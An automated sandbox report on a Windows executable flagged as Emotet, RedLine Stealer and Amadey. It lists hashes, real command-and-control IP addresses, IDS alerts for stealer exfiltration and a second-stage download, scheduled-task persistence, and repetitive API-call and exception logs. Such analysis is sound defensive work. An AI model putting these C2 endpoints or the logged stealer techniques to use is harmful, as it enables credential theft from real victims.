popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

foto166.exe

Emotet Gen1 UPX Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) PE File OS Processor Check PE32 CAB DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 19, 2023, 7:41 a.m. June 19, 2023, 7:44 a.m.
Size 573.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5588669e4aad613744e9d61d340fd20d
SHA256 c0c6c93a0c9c04fe71cf26e55f2aa62499eaaa9aaba087e1b8ba90e27fc15ebd
CRC32 0BDEFC8D
ssdeep 12288:5Mrby90Ae4RA4E6OybBpS4UhY/HBfx072pJVF5H:2y8obPS4iCdeap/
PDB Path wextract.pdb
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
77.91.68.63 Active Moloch
83.97.73.129 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 83.97.73.129:19071 -> 192.168.56.103:49172 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 83.97.73.129:19071 -> 192.168.56.103:49172 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 83.97.73.129:19071 -> 192.168.56.103:49166 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.68.63:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.68.63:80 2044695 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M1 A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.68.63:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49172 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.68.63:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 83.97.73.129:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.68.63:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49181 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.68.63:80 -> 192.168.56.103:49181 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49181 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "rugen.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054ba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054bac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054bac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054bc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054c3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054c3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0054c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003085f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308670
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00308e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0xab9a71
0xab9873
0xab7ad8
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xab9ba8
registers.esp: 3469188
registers.edi: 3469240
registers.eax: 0
registers.ebp: 3469252
registers.edx: 5384488
registers.ebx: 3470684
registers.esi: 42244824
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25d589c
0x25d5132
0x25d5005
0x25d38bb
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467716
registers.edi: 3468060
registers.eax: 0
registers.ebp: 3467724
registers.edx: 0
registers.ebx: 3470684
registers.esi: 43028448
registers.ecx: 44154924
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25d589c
0x25d5132
0x25d501d
0x25d38bb
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467716
registers.edi: 3468060
registers.eax: 0
registers.ebp: 3467724
registers.edx: 0
registers.ebx: 3470684
registers.esi: 43028448
registers.ecx: 45459616
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25d589c
0x25d5132
0x25d501d
0x25d38bb
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467716
registers.edi: 3468060
registers.eax: 0
registers.ebp: 3467724
registers.edx: 0
registers.ebx: 3470684
registers.esi: 43028448
registers.ecx: 42922200
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25da43e
0x25d9cf9
0x25d5005
0x25d3ba4
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x25d9973
registers.esp: 3467692
registers.edi: 3468084
registers.eax: 0
registers.ebp: 3467700
registers.edx: 0
registers.ebx: 3470684
registers.esi: 41875664
registers.ecx: 44231040
1 0 0

__exception__

 stacktrace: 
0x25d9930
0x25da43e
0x25d9cf9
0x25d501d
0x25d3ba4
0x25d2a51
0xabd9ff
0xab7c1d
0xab72d3
0xab3c6b
0xab35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
